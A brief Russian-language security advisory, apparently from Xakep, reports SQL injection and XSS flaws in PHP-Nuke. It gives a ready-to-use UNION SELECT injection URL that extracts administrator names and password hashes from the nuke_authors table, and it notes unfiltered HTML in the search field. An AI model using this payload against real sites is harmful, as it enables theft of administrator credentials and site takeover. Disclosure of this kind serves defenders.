Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Программа: PHP-Nuke
Несколько уязвимостей в PHP-Nuke позволяют удаленному пользователю выполнить SQL команды и XSS нападение.
1. SQL инъекция:
http://localhost/nuke73/modules.php?name= Search&type=comments&query=not123exist
s&instory=/**/UNION/**/SELECT/**/ 0,0,pwd,0,aid/**/FROM/** /nuke_authors
2. /modules/Search/index.php не фильтрует HTML код в поле поиска.